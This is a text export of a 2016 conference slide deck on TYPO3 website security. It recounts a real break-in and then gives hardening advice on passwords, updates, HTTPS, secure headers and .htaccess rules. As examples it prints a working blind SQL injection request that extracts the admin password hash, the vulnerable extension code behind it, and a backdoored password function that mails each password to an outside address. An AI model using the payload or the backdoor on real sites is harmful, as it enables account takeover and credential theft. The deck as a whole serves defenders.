2016-09-25 - TYPO3 Security T3CMallorca 2016 Export . Download Slides jweiland.net/t3cmallorca....

61
TYPO3 Security Jochen Weiland TYPO3camp Mallorca 2016

Transcript of 2016-09-25 - TYPO3 Security T3CMallorca 2016 Export . Download Slides jweiland.net/t3cmallorca....

Page 1: 2016-09-25 - TYPO3 Security T3CMallorca 2016 Export . Download Slides jweiland.net/t3cmallorca. Title: 2016-09-25 - TYPO3 Security T3CMallorca 2016 Export.key Created Date: 9/25/2016

TYPO3 Security

Jochen Weiland TYPO3camp Mallorca 2016

Page 2: 2016-09-25 - TYPO3 Security T3CMallorca 2016 Export . Download Slides jweiland.net/t3cmallorca. Title: 2016-09-25 - TYPO3 Security T3CMallorca 2016 Export.key Created Date: 9/25/2016

Do you know Belarus?

Page 3: 2016-09-25 - TYPO3 Security T3CMallorca 2016 Export . Download Slides jweiland.net/t3cmallorca. Title: 2016-09-25 - TYPO3 Security T3CMallorca 2016 Export.key Created Date: 9/25/2016

Do you know Belarus?

3000 km

Minsk

Page 4: 2016-09-25 - TYPO3 Security T3CMallorca 2016 Export . Download Slides jweiland.net/t3cmallorca. Title: 2016-09-25 - TYPO3 Security T3CMallorca 2016 Export.key Created Date: 9/25/2016

They Check for SQL Injection in Extensions

with sqlmap

/index.php?filterinvolved=&id=826&note=note6&filtertyp=1&filternote=3 AND (SELECT * FROM (SELECT(SLEEP(2-(IF(ORD(MID((SELECT IFNULL(CAST(password AS CHAR),0x20) FROM be_users WHERE admin=1 and disable=0 and deleted=0 LIMIT 0,1),33,1))>1,0,2)))))

Page 5: 2016-09-25 - TYPO3 Security T3CMallorca 2016 Export . Download Slides jweiland.net/t3cmallorca. Title: 2016-09-25 - TYPO3 Security T3CMallorca 2016 Export.key Created Date: 9/25/2016

Extension contained this code:

$add_where[] = ' AND '.$_GET['note'].' = '.$_GET['filternote'];

$sql = 'SELECT uid, einrichtung, pdf FROM tx_...... WHERE pid = "'.$pid .'" '.$add_where;

Page 6: 2016-09-25 - TYPO3 Security T3CMallorca 2016 Export . Download Slides jweiland.net/t3cmallorca. Title: 2016-09-25 - TYPO3 Security T3CMallorca 2016 Export.key Created Date: 9/25/2016
Page 7: 2016-09-25 - TYPO3 Security T3CMallorca 2016 Export . Download Slides jweiland.net/t3cmallorca. Title: 2016-09-25 - TYPO3 Security T3CMallorca 2016 Export.key Created Date: 9/25/2016

Now the hacker can login as an administrator

• View/modify/delete any data

• install t3quixplorer - has access to file system, can upload any file anywhere

Page 8: 2016-09-25 - TYPO3 Security T3CMallorca 2016 Export . Download Slides jweiland.net/t3cmallorca. Title: 2016-09-25 - TYPO3 Security T3CMallorca 2016 Export.key Created Date: 9/25/2016

…and leave some backdoor

Page 9: 2016-09-25 - TYPO3 Security T3CMallorca 2016 Export . Download Slides jweiland.net/t3cmallorca. Title: 2016-09-25 - TYPO3 Security T3CMallorca 2016 Export.key Created Date: 9/25/2016

But this is not all…

• install local saltedpassword extension(priority over system extension)

Page 10: 2016-09-25 - TYPO3 Security T3CMallorca 2016 Export . Download Slides jweiland.net/t3cmallorca. Title: 2016-09-25 - TYPO3 Security T3CMallorca 2016 Export.key Created Date: 9/25/2016

But this is not all…

• install local saltedpassword extension(priority over system extension)

• Extension has a special feature:

Page 11: 2016-09-25 - TYPO3 Security T3CMallorca 2016 Export . Download Slides jweiland.net/t3cmallorca. Title: 2016-09-25 - TYPO3 Security T3CMallorca 2016 Export.key Created Date: 9/25/2016

But this is not all…

• install local saltedpassword extension(priority over system extension)

• Extension has a special feature:

protected function cryptPassword($password, $setting) { $saltedPW = NULL; mail("[email protected]", "TYPO3", $password); (or mail(„[email protected]“, "TYPO3", $password);)

Page 12: 2016-09-25 - TYPO3 Security T3CMallorca 2016 Export . Download Slides jweiland.net/t3cmallorca. Title: 2016-09-25 - TYPO3 Security T3CMallorca 2016 Export.key Created Date: 9/25/2016

What to do next

• Take web site offline

• Find, remove and clean up all affected files

• Find point of entry and fix the security hole

• Change all passwords (Backend Users, Frontend Users, MySQL, Install Tool, Encryption Key)

• Notify users, customers, authorities…

Page 13: 2016-09-25 - TYPO3 Security T3CMallorca 2016 Export . Download Slides jweiland.net/t3cmallorca. Title: 2016-09-25 - TYPO3 Security T3CMallorca 2016 Export.key Created Date: 9/25/2016

Security Threats• Information Disclosure

• Identity Theft

• SQL Injection

• Code Injection

• Authorization Bypass

• Cross Site Scripting (XSS)

• Cross Site Request Forgery (XSRF)

Page 14: 2016-09-25 - TYPO3 Security T3CMallorca 2016 Export . Download Slides jweiland.net/t3cmallorca. Title: 2016-09-25 - TYPO3 Security T3CMallorca 2016 Export.key Created Date: 9/25/2016
Page 15: 2016-09-25 - TYPO3 Security T3CMallorca 2016 Export . Download Slides jweiland.net/t3cmallorca. Title: 2016-09-25 - TYPO3 Security T3CMallorca 2016 Export.key Created Date: 9/25/2016
Page 16: 2016-09-25 - TYPO3 Security T3CMallorca 2016 Export . Download Slides jweiland.net/t3cmallorca. Title: 2016-09-25 - TYPO3 Security T3CMallorca 2016 Export.key Created Date: 9/25/2016

Published Exploits

Source: exploit-db.com

Sept 10, 2016

Joomla 1.153

Wordpress 929

Drupal 30

TYPO3 15

Page 17: 2016-09-25 - TYPO3 Security T3CMallorca 2016 Export . Download Slides jweiland.net/t3cmallorca. Title: 2016-09-25 - TYPO3 Security T3CMallorca 2016 Export.key Created Date: 9/25/2016

Passwords

Page 18: 2016-09-25 - TYPO3 Security T3CMallorca 2016 Export . Download Slides jweiland.net/t3cmallorca. Title: 2016-09-25 - TYPO3 Security T3CMallorca 2016 Export.key Created Date: 9/25/2016

Secure Passwords!

• Minimum length of 9 Characters

• Mix A-Z, a-z, 0-9, special characters

• No Personal Information

• Nothing from a Dictionary

Page 19: 2016-09-25 - TYPO3 Security T3CMallorca 2016 Export . Download Slides jweiland.net/t3cmallorca. Title: 2016-09-25 - TYPO3 Security T3CMallorca 2016 Export.key Created Date: 9/25/2016

Secure Passwords!

• Minimum length of 9 11 Characters

• Mix A-Z, a-z, 0-9, special characters

• No Personal Information

• Nothing from a Dictionary

Page 20: 2016-09-25 - TYPO3 Security T3CMallorca 2016 Export . Download Slides jweiland.net/t3cmallorca. Title: 2016-09-25 - TYPO3 Security T3CMallorca 2016 Export.key Created Date: 9/25/2016
Page 21: 2016-09-25 - TYPO3 Security T3CMallorca 2016 Export . Download Slides jweiland.net/t3cmallorca. Title: 2016-09-25 - TYPO3 Security T3CMallorca 2016 Export.key Created Date: 9/25/2016
Page 22: 2016-09-25 - TYPO3 Security T3CMallorca 2016 Export . Download Slides jweiland.net/t3cmallorca. Title: 2016-09-25 - TYPO3 Security T3CMallorca 2016 Export.key Created Date: 9/25/2016

Secure Passwords!

• NEVER the same password for different sites!

• NEVER login anywhere without SSL when using public WiFi!

• Use a Password Manager!

Page 23: 2016-09-25 - TYPO3 Security T3CMallorca 2016 Export . Download Slides jweiland.net/t3cmallorca. Title: 2016-09-25 - TYPO3 Security T3CMallorca 2016 Export.key Created Date: 9/25/2016
Page 24: 2016-09-25 - TYPO3 Security T3CMallorca 2016 Export . Download Slides jweiland.net/t3cmallorca. Title: 2016-09-25 - TYPO3 Security T3CMallorca 2016 Export.key Created Date: 9/25/2016

You all follow these rules, right?

Page 25: 2016-09-25 - TYPO3 Security T3CMallorca 2016 Export . Download Slides jweiland.net/t3cmallorca. Title: 2016-09-25 - TYPO3 Security T3CMallorca 2016 Export.key Created Date: 9/25/2016

Source: https://www.leakedsource.com/blog/linkedin

Page 26: 2016-09-25 - TYPO3 Security T3CMallorca 2016 Export . Download Slides jweiland.net/t3cmallorca. Title: 2016-09-25 - TYPO3 Security T3CMallorca 2016 Export.key Created Date: 9/25/2016

Keep TYPO3 Source and Extensions

up-to-date

Page 27: 2016-09-25 - TYPO3 Security T3CMallorca 2016 Export . Download Slides jweiland.net/t3cmallorca. Title: 2016-09-25 - TYPO3 Security T3CMallorca 2016 Export.key Created Date: 9/25/2016

Subscribe to TYPO3-announce on lists.typo3.org

Page 28: 2016-09-25 - TYPO3 Security T3CMallorca 2016 Export . Download Slides jweiland.net/t3cmallorca. Title: 2016-09-25 - TYPO3 Security T3CMallorca 2016 Export.key Created Date: 9/25/2016

Security Bulletin? Install Update asap!

Page 29: 2016-09-25 - TYPO3 Security T3CMallorca 2016 Export . Download Slides jweiland.net/t3cmallorca. Title: 2016-09-25 - TYPO3 Security T3CMallorca 2016 Export.key Created Date: 9/25/2016

Use Encryption

• Provide https:// for everything

Page 30: 2016-09-25 - TYPO3 Security T3CMallorca 2016 Export . Download Slides jweiland.net/t3cmallorca. Title: 2016-09-25 - TYPO3 Security T3CMallorca 2016 Export.key Created Date: 9/25/2016

Test your SSL Certificate

• https://www.ssllabs.com/ssltest/

Page 31: 2016-09-25 - TYPO3 Security T3CMallorca 2016 Export . Download Slides jweiland.net/t3cmallorca. Title: 2016-09-25 - TYPO3 Security T3CMallorca 2016 Export.key Created Date: 9/25/2016
Page 32: 2016-09-25 - TYPO3 Security T3CMallorca 2016 Export . Download Slides jweiland.net/t3cmallorca. Title: 2016-09-25 - TYPO3 Security T3CMallorca 2016 Export.key Created Date: 9/25/2016
Page 33: 2016-09-25 - TYPO3 Security T3CMallorca 2016 Export . Download Slides jweiland.net/t3cmallorca. Title: 2016-09-25 - TYPO3 Security T3CMallorca 2016 Export.key Created Date: 9/25/2016

Never trust any User Input

Page 34: 2016-09-25 - TYPO3 Security T3CMallorca 2016 Export . Download Slides jweiland.net/t3cmallorca. Title: 2016-09-25 - TYPO3 Security T3CMallorca 2016 Export.key Created Date: 9/25/2016

User Input

• Data submitted in Forms

• Data submitted as parameter in URL

• Data submitted as a file or file name

• ALWAYS filter, escape, white-list

Page 35: 2016-09-25 - TYPO3 Security T3CMallorca 2016 Export . Download Slides jweiland.net/t3cmallorca. Title: 2016-09-25 - TYPO3 Security T3CMallorca 2016 Export.key Created Date: 9/25/2016

Information Disclosure

Page 36: 2016-09-25 - TYPO3 Security T3CMallorca 2016 Export . Download Slides jweiland.net/t3cmallorca. Title: 2016-09-25 - TYPO3 Security T3CMallorca 2016 Export.key Created Date: 9/25/2016
Page 37: 2016-09-25 - TYPO3 Security T3CMallorca 2016 Export . Download Slides jweiland.net/t3cmallorca. Title: 2016-09-25 - TYPO3 Security T3CMallorca 2016 Export.key Created Date: 9/25/2016
Page 38: 2016-09-25 - TYPO3 Security T3CMallorca 2016 Export . Download Slides jweiland.net/t3cmallorca. Title: 2016-09-25 - TYPO3 Security T3CMallorca 2016 Export.key Created Date: 9/25/2016

Secure Headers

• HSTS: Downgrade Attacks, Cookie Hijacking

• X-Frame: Clickjacking

• X-XSS Protection

• X-Content-Type-Options

https://www.owasp.org/index.php/OWASP_Secure_Headers_Project

Page 39: 2016-09-25 - TYPO3 Security T3CMallorca 2016 Export . Download Slides jweiland.net/t3cmallorca. Title: 2016-09-25 - TYPO3 Security T3CMallorca 2016 Export.key Created Date: 9/25/2016

config.additionalHeaders = strict-transport-security: max-age=31536000; includeSubdomains | x-frame-options: SAMEORIGIN | X-XSS-Protection: 1; mode=block | X-Content-Type-Options: nosniff | X-Powered-By: nothing

Add this to TS Setup

Page 40: 2016-09-25 - TYPO3 Security T3CMallorca 2016 Export . Download Slides jweiland.net/t3cmallorca. Title: 2016-09-25 - TYPO3 Security T3CMallorca 2016 Export.key Created Date: 9/25/2016

HSTS - HTTP Strict Transport Security

• Browser should only connect through HTTPS, never HTTP with this web site

Page 41: 2016-09-25 - TYPO3 Security T3CMallorca 2016 Export . Download Slides jweiland.net/t3cmallorca. Title: 2016-09-25 - TYPO3 Security T3CMallorca 2016 Export.key Created Date: 9/25/2016

X-Frame-Options

• Prevents display of content if embedded in a frame of other web sitesdenyno rendering in frames at allsameoriginonly in frames from same domainallow-from: DOMAIN specifiy allowed domain

Page 42: 2016-09-25 - TYPO3 Security T3CMallorca 2016 Export . Download Slides jweiland.net/t3cmallorca. Title: 2016-09-25 - TYPO3 Security T3CMallorca 2016 Export.key Created Date: 9/25/2016

X-XSS-Protection

• Enables Cross-Site Scripting Filter in Browser 1Filter enabled, Browser sanitizes page 1; mode=block Filter enabled, Page not rendered

Page 43: 2016-09-25 - TYPO3 Security T3CMallorca 2016 Export . Download Slides jweiland.net/t3cmallorca. Title: 2016-09-25 - TYPO3 Security T3CMallorca 2016 Export.key Created Date: 9/25/2016

X-Content-Type-Options

• nosniff Prevents IE and Chrome from MIME-sniffing

• CSS and Scripts will only be loaded, if correct MIME type is specified, i.e.text/csstext/javascript

Page 44: 2016-09-25 - TYPO3 Security T3CMallorca 2016 Export . Download Slides jweiland.net/t3cmallorca. Title: 2016-09-25 - TYPO3 Security T3CMallorca 2016 Export.key Created Date: 9/25/2016

Disable Directory Index

Page 45: 2016-09-25 - TYPO3 Security T3CMallorca 2016 Export . Download Slides jweiland.net/t3cmallorca. Title: 2016-09-25 - TYPO3 Security T3CMallorca 2016 Export.key Created Date: 9/25/2016

Disable Directory Index

Page 46: 2016-09-25 - TYPO3 Security T3CMallorca 2016 Export . Download Slides jweiland.net/t3cmallorca. Title: 2016-09-25 - TYPO3 Security T3CMallorca 2016 Export.key Created Date: 9/25/2016

database.sql

Page 47: 2016-09-25 - TYPO3 Security T3CMallorca 2016 Export . Download Slides jweiland.net/t3cmallorca. Title: 2016-09-25 - TYPO3 Security T3CMallorca 2016 Export.key Created Date: 9/25/2016

Apache Configuration

<Directory/path/to/your/webroot/>OptionsIndexesFollowSymLinks</Directory>

Page 48: 2016-09-25 - TYPO3 Security T3CMallorca 2016 Export . Download Slides jweiland.net/t3cmallorca. Title: 2016-09-25 - TYPO3 Security T3CMallorca 2016 Export.key Created Date: 9/25/2016

SQL Injection

Page 49: 2016-09-25 - TYPO3 Security T3CMallorca 2016 Export . Download Slides jweiland.net/t3cmallorca. Title: 2016-09-25 - TYPO3 Security T3CMallorca 2016 Export.key Created Date: 9/25/2016
Page 50: 2016-09-25 - TYPO3 Security T3CMallorca 2016 Export . Download Slides jweiland.net/t3cmallorca. Title: 2016-09-25 - TYPO3 Security T3CMallorca 2016 Export.key Created Date: 9/25/2016
Page 51: 2016-09-25 - TYPO3 Security T3CMallorca 2016 Export . Download Slides jweiland.net/t3cmallorca. Title: 2016-09-25 - TYPO3 Security T3CMallorca 2016 Export.key Created Date: 9/25/2016

# deny SQL injection attacks RewriteCond %{QUERY_STRING} union [NC] RewriteRule .* /404.html? [R=301,L]

Add this to .htaccess

Page 52: 2016-09-25 - TYPO3 Security T3CMallorca 2016 Export . Download Slides jweiland.net/t3cmallorca. Title: 2016-09-25 - TYPO3 Security T3CMallorca 2016 Export.key Created Date: 9/25/2016
Page 53: 2016-09-25 - TYPO3 Security T3CMallorca 2016 Export . Download Slides jweiland.net/t3cmallorca. Title: 2016-09-25 - TYPO3 Security T3CMallorca 2016 Export.key Created Date: 9/25/2016

Restrict Access

Page 54: 2016-09-25 - TYPO3 Security T3CMallorca 2016 Export . Download Slides jweiland.net/t3cmallorca. Title: 2016-09-25 - TYPO3 Security T3CMallorca 2016 Export.key Created Date: 9/25/2016

Never use FTP! All data is sent in clear text!

Page 55: 2016-09-25 - TYPO3 Security T3CMallorca 2016 Export . Download Slides jweiland.net/t3cmallorca. Title: 2016-09-25 - TYPO3 Security T3CMallorca 2016 Export.key Created Date: 9/25/2016

Restrict Server Ports

• Port 80, 443 (Browser)

• Port 22 (SSH)

Page 56: 2016-09-25 - TYPO3 Security T3CMallorca 2016 Export . Download Slides jweiland.net/t3cmallorca. Title: 2016-09-25 - TYPO3 Security T3CMallorca 2016 Export.key Created Date: 9/25/2016

Database Access

• Limit privileges

• Don’t allow access from outside

• Do not bind DB server to network interface

Page 57: 2016-09-25 - TYPO3 Security T3CMallorca 2016 Export . Download Slides jweiland.net/t3cmallorca. Title: 2016-09-25 - TYPO3 Security T3CMallorca 2016 Export.key Created Date: 9/25/2016

File Access

• Do not allow access to file extensions:.t3d, .sql, .ts, .bak, .tmp, … in .htaccess: <FilesMatch "\.(t3d|sql|ts|bak|tmp)$"> Order Allow,Deny Deny from all </FilesMatch>

Page 58: 2016-09-25 - TYPO3 Security T3CMallorca 2016 Export . Download Slides jweiland.net/t3cmallorca. Title: 2016-09-25 - TYPO3 Security T3CMallorca 2016 Export.key Created Date: 9/25/2016

Extensions

• Remove unused Extensions

• Remove „Development“ Extensions from Live System- phpmyadmin - t3quixplorer - extension_builder

Page 59: 2016-09-25 - TYPO3 Security T3CMallorca 2016 Export . Download Slides jweiland.net/t3cmallorca. Title: 2016-09-25 - TYPO3 Security T3CMallorca 2016 Export.key Created Date: 9/25/2016

Deny Access to Hacker from Belarus

• in .htaccess: order allow,deny deny from 178.122.

Page 60: 2016-09-25 - TYPO3 Security T3CMallorca 2016 Export . Download Slides jweiland.net/t3cmallorca. Title: 2016-09-25 - TYPO3 Security T3CMallorca 2016 Export.key Created Date: 9/25/2016

Helpful Links

• Contact the Security Team:security @ typo3.org

• Read the TYPO3 Security Guide:docs.typo3.org/typo3cms/SecurityGuide/

• Subscribe to TYPO3-announce:lists.typo3.org

Page 61: 2016-09-25 - TYPO3 Security T3CMallorca 2016 Export . Download Slides jweiland.net/t3cmallorca. Title: 2016-09-25 - TYPO3 Security T3CMallorca 2016 Export.key Created Date: 9/25/2016

Download Slides

jweiland.net/t3cmallorca